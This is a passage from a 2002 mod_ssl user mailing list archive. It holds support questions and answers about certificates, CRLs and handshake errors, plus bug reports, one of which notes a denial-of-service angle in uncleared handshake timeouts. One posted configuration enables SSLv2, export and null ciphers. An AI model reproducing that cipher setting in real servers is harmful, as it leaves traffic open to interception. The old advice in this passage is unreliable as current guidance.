------=_NextPart_000_00CC_01C1D105.5EEB86E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 21 16:22:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA09886; Thu, 21 Mar 2002 16:21:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id QAA09852; Thu, 21 Mar 2002 16:20:32 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id QAA22452 for ; Thu, 21 Mar 2002 16:20:25 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma022395; Thu, 21 Mar 02 16:20:18 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id QAA02855 for ; Thu, 21 Mar 2002 16:20:17 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id QAA04468 for ; Thu, 21 Mar 2002 16:20:17 +0100 (MET) Message-ID: <3C99FA31.64EB4B4B@bourse.ch> Date: Thu, 21 Mar 2002 16:20:17 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apachectl starts but I am unable to connect to my https site References: <00cf01c1d0d7$457d2520$400a0a0a@EWSUC042> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Janardhan wrote: > > Hello modssl-users, > > I have configured 2 seperate Apache servers in different machines with > modssl. I created self CA using openssl and created server > certificates also. > One of the Apache https server works fine and I am facing problem with > another server. The problem is Apachectl starts but I am unable to > connect to my https site using browser. Why are you unable to connect? - timeout? - error? - you haven't got a return key on your keyboard? Sorry for being cheeky but you are not providing anything like enough details to allow anyone to help you. What do you type in the browser? what does the browser do? what is in the error, access and ssl logs on the server? Is apache really running (ps -ef - don't rely on apachhectl saying "httpd started")? is the server really listening to port 443? (netstat -a) what OS are you on? what browser? local or network? anything else you can think of? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 21 16:30:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA10293; Thu, 21 Mar 2002 16:29:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.safenebraska.org id QAA10258; Thu, 21 Mar 2002 16:28:37 +0100 (MET) Received: from there ([192.168.1.100]) by www.safenebraska.org (8.11.6/8.11.6/SuSE Linux 0.5) with SMTP id g2LFUIM10305 for ; Thu, 21 Mar 2002 09:30:18 -0600 Message-Id: <200203211530.g2LFUIM10305@www.safenebraska.org> Content-Type: text/plain; charset="iso-8859-1" From: Marcel Erkens To: modssl-users@modssl.org Subject: Re: Apachectl starts but I am unable to connect to my https site Date: Thu, 21 Mar 2002 09:42:27 -0600 X-Mailer: KMail [version 1.3.1] References: <00cf01c1d0d7$457d2520$400a0a0a@EWSUC042> <3C99FA31.64EB4B4B@bourse.ch> In-Reply-To: <3C99FA31.64EB4B4B@bourse.ch> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Marcel Erkens X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users to quote the Jerky Boys... "You didn't have to be so hurtful, so angry with him" LOL! Sorry, I couldn't resist On Thursday 21 March 2002 09:20, you wrote: > > Janardhan wrote: > > > > Hello modssl-users, > > > > I have configured 2 seperate Apache servers in different machines with > > modssl. I created self CA using openssl and created server > > certificates also. > > One of the Apache https server works fine and I am facing problem with > > another server. The problem is Apachectl starts but I am unable to > > connect to my https site using browser. > > Why are you unable to connect? > > - timeout? > - error? > - you haven't got a return key on your keyboard? > > Sorry for being cheeky but you are not providing anything like enough > details to allow anyone to help you. What do you type in the browser? > what does the browser do? what is in the error, access and ssl logs on > the server? Is apache really running (ps -ef - don't rely on apachhectl > saying "httpd started")? is the server really listening to port 443? > (netstat -a) what OS are you on? what browser? local or network? > anything else you can think of? > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 21 21:33:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA26257; Thu, 21 Mar 2002 21:32:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe010.worldonline.dk id VAA26209; Thu, 21 Mar 2002 21:31:42 +0100 (MET) Received: (qmail 5160 invoked by uid 0); 21 Mar 2002 20:31:34 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe010.worldonline.dk with SMTP; 21 Mar 2002 20:31:34 -0000 Date: Thu, 21 Mar 2002 21:30:35 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <554891523.20020321213035@e-box.dk> To: modssl-users@modssl.org Subject: Error when signing my cert MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have followed the FAQ: http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28 And I have made my own CA, but when I try to do: ./sign.sh server.csr I get the following error: Using configuration from ca.config ./ca.key: No such file or directory trying to load CA private key 52039:error:02001002:system library:fopen:No such file or directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:245:fopen('./ca.key','r') 52039:error:20074002:BIO routines:FILE_CTRL:system lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:247: CA verifying: server.crt <-> CA cert server.crt: No such file or directory 52040:error:02001002:system library:fopen:No such file or directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:245:fopen('server.crt','r') 52040:error:20074002:BIO routines:FILE_CTRL:system lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:247: What is this, and how do I fix it? -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk -- "Memory is like an orgasm. It's a lot better if you don't have to fake it." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 21 23:23:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA01844; Thu, 21 Mar 2002 23:22:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id XAA01824; Thu, 21 Mar 2002 23:21:50 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 21 Mar 2002 14:10:33 -0800 Received: from 156.153.255.236 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 21 Mar 2002 22:10:33 GMT X-Originating-IP: [156.153.255.236] From: "Edward Wong" To: modssl-users@modssl.org Subject: Changing Certificates Dynamically Date: Thu, 21 Mar 2002 14:10:33 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 21 Mar 2002 22:10:33.0302 (UTC) FILETIME=[3861E760:01C1D125] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hey All, This subject has probably already been broached, but is it possible to change certificates dynamically? I'm having problems getting apache to present the new certificate during renegotiation. For example, I start apache with a pre-existing self-signed certificate. Then I upload a new certificate to the server, and want to swtich to that certificate dynamically without restarting the server. Is this possible? When I do a "full renegotiation" as in ssl_engine_kernel.c, it doesn't actually DO anything with the new certificate--although it will change ciphers on subsequent connections (with old certificate). Any and all help is appreciated, Edward Wong _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 21 23:28:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA02070; Thu, 21 Mar 2002 23:27:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id XAA02066; Thu, 21 Mar 2002 23:27:09 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 203DCBD2A; Thu, 21 Mar 2002 23:28:37 +0100 (CET) Date: Thu, 21 Mar 2002 23:28:37 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Changing Certificates Dynamically Message-ID: <20020321222837.GC11276@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Mar 21, 2002 at 02:10:33PM -0800, Edward Wong wrote: > Hey All, > > This subject has probably already been broached, but is it possible to > change certificates dynamically? I'm having problems getting apache to > present the new certificate during renegotiation. > > For example, I start apache with a pre-existing self-signed certificate. > Then I upload a new certificate to the server, and want to swtich to that > certificate dynamically without restarting the server. > > Is this possible? No. You need a restart (I'm not even sure that a graceful restart is enough - I think you need the full stop/start) vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 22 00:16:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA05460; Fri, 22 Mar 2002 00:15:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id AAA05426; Fri, 22 Mar 2002 00:14:41 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 21 Mar 2002 15:03:28 -0800 Received: from 156.153.255.236 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 21 Mar 2002 23:03:28 GMT X-Originating-IP: [156.153.255.236] From: "Edward Wong" To: modssl-users@modssl.org Subject: Re: Changing Certificates Dynamically Date: Thu, 21 Mar 2002 15:03:28 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 21 Mar 2002 23:03:28.0928 (UTC) FILETIME=[9D33FA00:01C1D12C] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I believe you are correct on this matter. However, I've noticed something interesting: when I reload the certificate and private key files dynamically (the new ones), subsequent connections use the new certificate. I suppose I could go through and update ALL other existing server records in the same matter, but that idea seems to reek of insecure handling. Do you think this idea will work, or if it's just a nice-but-kludge idea? Ed >From: Mads Toftum >Reply-To: modssl-users@modssl.org >To: modssl-users@modssl.org >Subject: Re: Changing Certificates Dynamically >Date: Thu, 21 Mar 2002 23:28:37 +0100 > >On Thu, Mar 21, 2002 at 02:10:33PM -0800, Edward Wong wrote: > > Hey All, > > > > This subject has probably already been broached, but is it possible to > > change certificates dynamically? I'm having problems getting apache to > > present the new certificate during renegotiation. > > > > For example, I start apache with a pre-existing self-signed certificate. > > Then I upload a new certificate to the server, and want to swtich to >that > > certificate dynamically without restarting the server. > > > > Is this possible? > >No. You need a restart (I'm not even sure that a graceful restart is >enough - I think you need the full stop/start) > >vh > >Mads Toftum >-- >With a rubber duck, one's never alone. > -- "The Hitchhiker's Guide to the Galaxy" >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 22 10:20:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA02329; Fri, 22 Mar 2002 10:19:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA02297; Fri, 22 Mar 2002 10:18:10 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 858644CE726; Fri, 22 Mar 2002 10:18:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2M6IKW63776; Fri, 22 Mar 2002 07:18:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id VAA26195; Thu, 21 Mar 2002 21:31:11 +0100 (MET) Date: Thu, 21 Mar 2002 21:31:11 +0100 (MET) Message-Id: <200203212031.VAA26195@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] more helpful message when failing to get mutex (PR#679) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Fred Romelfanger Version: 2.8.7 OS: Solaris Submission from: (NULL) (130.167.114.38) During a stress test with modssl, I get the following error: [21/Mar/2002 13:37:55 14476] [warn] Failed to acquire global mutex lock Looking at the code, it would be nice to get the unix errno or error message assocated with the failed call to semop(). I added a perror call and the error it actually failed with was ENOSPC which indicates that I don't have the system configured with enough semaphore "undo" structures for the number of apache servers that I had running. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 22 10:20:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA02344; Fri, 22 Mar 2002 10:19:41 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA02298; Fri, 22 Mar 2002 10:18:10 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 966374CE738; Fri, 22 Mar 2002 10:18:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2M6IM863782; Fri, 22 Mar 2002 07:18:22 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id VAA27475; Thu, 21 Mar 2002 21:58:12 +0100 (MET) Date: Thu, 21 Mar 2002 21:58:12 +0100 (MET) Message-Id: <200203212058.VAA27475@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] PRIVATE: bogus SSL handshake timeouts under load? (PR#680) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Fred Romelfanger Version: 2.8.7 OS: Solaris Submission from: (NULL) (130.167.114.38) I noticed that during a stress test, that I would see the following error ocassionally. [Thu Mar 21 12:14:29 2002] [error] mod_ssl: SSL handshake timed out (client 130.167.114.38, server hoth.stsci.edu:443) When the timeout occurs one of my threads (in java) that is making the https connection locks up. I believe the timeout is not being reset if some sort of error that occurs on a prior pass through the module. In ssl_hook_NewConnection a timeout is setup prior to the while loop, and then the timeout is removed at the end of the while loop. There are several instances within the while loop where the code can retrun, but not clear the timeout. If I move the timeout code so it is just around the SSL_Accept call, the timeouts no longer occur: /* * We have to manage a I/O timeout ourself, because Apache * does it the first time when reading the request, but we're * working some time before this happens. */ ap_ctx_set(ap_global_ctx, "ssl::handshake::timeout", (void *)FALSE); ap_set_callback_and_alarm(ssl_hook_TimeoutConnection, srvr->timeout); rc = SSL_accept(ssl); /* * Remove the timeout handling */ ap_set_callback_and_alarm(NULL, 0); ap_ctx_set(ap_global_ctx, "ssl::handshake::timeout", (void *)FALSE); if( rc <= 0) { My guess is that a timeout is being setup for a prior connection and for some reason it is not being cleared. A later connection comes in and gets artifically timed out. If this is correct this has some denial of service implications with intentionally causing SSL errors to prevent other users from being able to access the server. The problem with the above fix is that I wasn't sure if any of the other code in the while loop actually interacted with the client application that could then get stuck in a read/write call. Also the timeouts appear to be too short. I didn't understand that. It looks like it is supposed to use the Timeout value from the apache configuration file. I have this set to 300 (seconds), but the timeout occurs sooner than that, so there maybe something else going on that I don't see. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 22 10:23:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA02543; Fri, 22 Mar 2002 10:22:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mhub.AXP.MDX.AC.UK id KAA02469; Fri, 22 Mar 2002 10:21:28 +0100 (MET) Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636) id <01KFNMXEH6WW00VJ1P@mdx.ac.uk> for modssl-users@modssl.org; Fri, 22 Mar 2002 09:23:59 +0000 (GMT) Received: from mdx-cpq-temp1.nw.mdx.ac.uk ([158.94.52.12]) by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KFNMXE9ZWK00IH5V@mdx.ac.uk> for modssl-users@modssl.org; Fri, 22 Mar 2002 09:23:59 +0000 (GMT) Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk (Mercury 1.48); Fri, 22 Mar 2002 09:21:21 +0000 Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Fri, 22 Mar 2002 09:21:18 +0000 Date: Fri, 22 Mar 2002 09:20:46 +0000 From: a.moon@mdx.ac.uk Subject: [BugDB] more helpful message when failing to get mutex (PR#679) To: modssl-users@modssl.org Message-id: Content-transfer-encoding: 7BIT X-Autoreply-From: X-Comment: Middlesex University has scanned this message for viruses. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: a.moon@mdx.ac.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am not in the office for the week 18-22 March 2002 If it's an Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter that requires urgent attention then please contact either Kirsteen1 or Sanjay1 who should be able to help. Otherwise I will contact you as soon as possible on my return. If you are student on MKT3035 GIS for Business - I will contact you asap or if urgent please contact the module tutor All the best Alex ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 22 11:01:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA04128; Fri, 22 Mar 2002 11:00:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mx1.abcomp.be id KAA04019; Fri, 22 Mar 2002 10:59:12 +0100 (MET) From: Koen@abcomp.be Received: from mailhost.abcomp.be (suntech.abcomp.be [172.16.1.1]) by mx1.abcomp.be (8.11.2/8.11.0) with ESMTP id g2M9vUM01876 for ; Fri, 22 Mar 2002 10:57:30 +0100 (MET) Received: from ab-notes-sun.abcomp.be (localhost [127.0.0.1]) by mailhost.abcomp.be (8.9.3/8.9.3) with ESMTP id KAA20339 for ; Fri, 22 Mar 2002 10:51:44 +0100 (MET) To: modssl-users@modssl.org Subject: Re: SSL server malfunctioning after updating a CRL MIME-Version: 1.0 X-Mailer: Lotus Notes Release 5.0.8 June 18, 2001 Message-ID: Date: Fri, 22 Mar 2002 10:49:33 +0100 X-MIMETrack: Serialize by Router on ab-notes-sun/AB Computers(Release 5.07a |May 14, 2001) at 03/22/2002 10:49:34 AM, Serialize complete at 03/22/2002 10:49:34 AM Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Koen@abcomp.be X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I found the solution to the problem. Since the CRL won't get changed often or on a regular basis I configured the CRL to not expire. The iPlanet CA completely strips the NextUpdate field completely from the CRL when configured like this, making it not conform to RFC1422. Apparently that's why Apache only accepts the initial CRL and considers all CRL updates invalid. I don't know why Apache acts like this because it's also possible to update the CRL before the end of the validity period. A clear error message (instead of a child segmentation fault or a spurious SSL handshake) would have saved me a lot of work. I just set the validity date of the CRL to a long period. All the best, Koen Koen@abcomp.be Sent by: owner-modssl-users@modssl.org 03/20/02 10:12 AM Please respond to modssl-users To: modssl-users@modssl.org cc: Subject: SSL server malfunctioning after updating a CRL Hi, setup: *Sunblade100, Solaris 8 Apache 1.3.22 mod_ssl 2.8.5 OpenSSL 0.9.6c (other box with same problem Intel, RH linux 6.2) *an offline, standalone root CA running iPlanet certificate management system 4.22 on Windows NT 4.0 problem: Clients have to provide a valid certificate in order to get access. When a certificate gets revoked on the CA the CRL has to get transferred manually to the webserver by floppy (OCSP is not an option). After copying the new CRL in place and really stopping & starting Apache, clients can't connect to the webserver anymore. The dos CRLF was removed from the CRL and the headers are valid. Even when I change the headers of the original CRL (the working one) to another valid format, the same error occurs, so it's not because of the new CRL that the error occurs but any change in the current CRL. I changed -----BEGIN CERTIFICATE REVOCATION LIST----- to -----BEGIN X509 CRL------ and the same for the END tag of course. Symbolic links shouldn't have anything to with it since I'm using the SSLCARevocationFile directive. My guess is that mod_ssl keeps a hash / checksum somewhere and detects changes in the CRL, but I wouldn't know where to look for it. Does anybody know how I can replace the CRL? The server works perfectly when SSLVerification require. I didn't find any info on this in the faq of mod_ssl or OpenSSL. Best regards, Koen B. ssl_error_log shows this: [20/Mar/2002 09:32:44] [notice] child pid 1199 exit Segmentation Fault (11) ssl_engine_log: [20/Mar/2002 09:32:44 01199] [trace] Certificate Verification: depth: 1, subject: /C=fr/O=xxx/CN=Certificate Manager, issuer: /C=fr/O=xxx/CN=Certificate Manager[20/Mar/2002 09:32:44 01202] [info] Connection to child 4 established (server fake.domainname.com:443, client 192.168.0.10) [20/Mar/2002 09:32:44 01202] [info] Seeding PRNG with 512 bytes of entropy [20/Mar/2002 09:32:44 01202] [trace] OpenSSL: Handshake: start [20/Mar/2002 09:32:44 01202] [trace] OpenSSL: Loop: before/accept initialization[20/Mar/2002 09:32:44 01202] [debug] OpenSSL: read 0/11 bytes from BIO#00208B10 [mem: 0021EC58] (BIO dump follows) +-------------------------------------------------------------------------+ +-------------------------------------------------------------------------+ [20/Mar/2002 09:32:44 01202] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] relevant snippet from httpd.conf: ... SSLPassPhraseDialog builtin SSLSessionCache dbm:/usr/local/apache/logs/ssl_scache SSLSessionCacheTimeout 300 SSLMutex file:/usr/local/apache/logs/ssl_mutex SSLRandomSeed startup file:/usr/local/apache/randfile.rnd 512 SSLRandomSeed connect file:/usr/local/apache/randfile.rnd 512 SSLLog /usr/local/apache/logs/ssl_engine_log SSLLogLevel debug ErrorLog logs/ssl_error_log ... DocumentRoot "/usr/local/apache/htdocs" ServerName fake.domainname.com ServerAdmin root@fake.domainname.com ErrorLog /usr/local/apache/logs/error_log TransferLog /usr/local/apache/logs/access_log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /usr/local/apache/conf/ssl.crt/fake.domainname.com.crt SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/fake.domainname.com.key SSLCACertificateFile /usr/local/apache/conf/ssl.crt/ca.testdomain.com.crt SSLCARevocationFile /usr/local/apache/conf/ssl.crl/ca.testdomain.com.crl SSLVerifyClient require SSLVerifyDepth 5 ... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 22 19:34:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA29530; Fri, 22 Mar 2002 19:33:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail id TAA29524; Fri, 22 Mar 2002 19:33:01 +0100 (MET) Received: from [10.10.10.84] by mail (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.80 (1.8.0.0)); Fri, 22 Mar 2002 13:32:54 -0500 From: "Philip Ravenscroft" To: Subject: error page on failure to negotiate ssl connection Date: Fri, 22 Mar 2002 13:32:51 -0500 Message-ID: <002301c1d1cf$fa266420$540a0a0a@projectmw.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Philip Ravenscroft" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We are using server-gated cryptography to mandate 128 bit key strength, but to also upgrade export browsers. However, we would like users who do not have adequate ssl support to see an error page we create rather than whatever their browser's error message it. Is there a way to do this with apache+mod_ssl? I imagine it's a bit of a chicken-and-egg problem because in order to redirect the user to an error page, a ssl connection has to be made at the lower cipher strength. Philip ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 23 10:37:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA16046; Sat, 23 Mar 2002 09:49:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe090.worldonline.dk id JAA15913; Sat, 23 Mar 2002 09:47:57 +0100 (MET) Received: (qmail 28696 invoked by uid 0); 23 Mar 2002 07:01:11 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by 212.54.64.152 with SMTP; 23 Mar 2002 07:01:11 -0000 Date: Sat, 23 Mar 2002 08:00:20 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <1151072532.20020323080020@e-box.dk> To: modssl-users@modssl.org Subject: Error when signing my cert MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Please let me know if I'm asking the wrong question here. I'm a newbie, and I really don't know how to get any further. I have followed the FAQ: http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28 And I have made my own CA, but when I try to do: ./sign.sh server.csr I get the following error: Using configuration from ca.config ./ca.key: No such file or directory trying to load CA private key 52039:error:02001002:system library:fopen:No such file or directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:245:fopen('./ca.key','r') 52039:error:20074002:BIO routines:FILE_CTRL:system lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:247: CA verifying: server.crt <-> CA cert server.crt: No such file or directory 52040:error:02001002:system library:fopen:No such file or directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:245:fopen('server.crt','r') 52040:error:20074002:BIO routines:FILE_CTRL:system lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:247: What is this, and how do I fix it? -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk -- "Memory is like an orgasm. It's a lot better if you don't have to 